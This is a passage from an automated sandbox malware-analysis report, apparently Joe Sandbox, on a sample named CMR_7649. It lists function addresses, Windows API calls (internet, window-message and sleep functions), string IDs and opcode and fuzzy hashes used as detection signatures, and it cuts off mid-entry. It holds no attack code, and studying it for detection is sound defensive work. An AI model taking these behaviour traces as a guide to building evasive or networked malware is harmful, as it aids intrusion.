                                                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID: &
                                                • API String ID: 2931989736-1010288
                                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
                                                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 00466825
                                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CrackInternet_wcslen
                                                • String ID: |
                                                • API String ID: 596671847-2343686810
                                                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                Download Yara Rule
                                                APIs
                                                • _strlen.LIBCMT ref: 0040F858
                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                • _sprintf.LIBCMT ref: 0040F9AE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove$_sprintf_strlen
                                                • String ID: %02X
                                                • API String ID: 1921645428-436463671
                                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: htonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 3832099526-2422070025
                                                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: InternetOpen
                                                • String ID: <local>
                                                • API String ID: 2038078732-4266983199
                                                • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: u,D
                                                • API String ID: 4104443479-3858472334
                                                • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • wsprintfW.USER32 ref: 0045612A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend_mallocwsprintf
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 1262938277-328681919
                                                • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetCloseHandle.WININET(?), ref: 00442663
                                                • InternetCloseHandle.WININET ref: 00442668
                                                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseHandleInternet$ObjectSingleWait
                                                • String ID: aeB
                                                • API String ID: 857135153-906807131
                                                • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                • PostMessageW.USER32(00000000), ref: 00441C05
                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
